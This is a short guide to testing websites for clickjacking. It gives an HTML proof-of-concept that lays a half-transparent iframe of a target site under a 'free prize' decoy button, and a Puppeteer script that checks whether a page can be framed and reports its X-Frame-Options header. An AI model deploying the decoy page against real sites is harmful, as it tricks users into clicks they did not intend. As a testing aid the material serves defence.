Testing for Clickjacking Vulnerabilities

Manual testing approach:

<!DOCTYPE html>
<html>
<head>
    <title>Clickjacking Test</title>
    <style>
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0.5;
            z-index: 1;
        }
        .decoy {
            position: absolute;
            top: 100px;
            left: 100px;
            z-index: 2;
            background: white;
            padding: 20px;
            border: 1px solid black;
        }
    </style>
</head>
<body>
    <iframe src="https://target-site.com"></iframe>
    <div class="decoy">
        <h2>Click here for free prize!</h2>
        <button>Claim Now</button>
    </div>
</body>
</html>

Automated testing script:

const puppeteer = require('puppeteer');

async function testClickjackingProtection(url) {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    
    try {
        // Create test page with iframe
        await page.setContent(`
            <iframe src="${url}" style="width:100%;height:600px;"></iframe>
        `);
        
        // Wait and check if content loaded in iframe
        await page.waitForTimeout(3000);
        
        const frameContent = await page.evaluate(() => {
            const iframe = document.querySelector('iframe');
            try {
                return iframe.contentDocument !== null;
            } catch (e) {
                return false;
            }
        });
        
        console.log(`${url} can be framed: ${frameContent}`);
        
        // Check response headers
        const response = await page.goto(url);
        const headers = response.headers();
        console.log('X-Frame-Options:', headers['x-frame-options'] || 'Not set');
        
    } finally {
        await browser.close();
    }
}

testClickjackingProtection('https://example.com');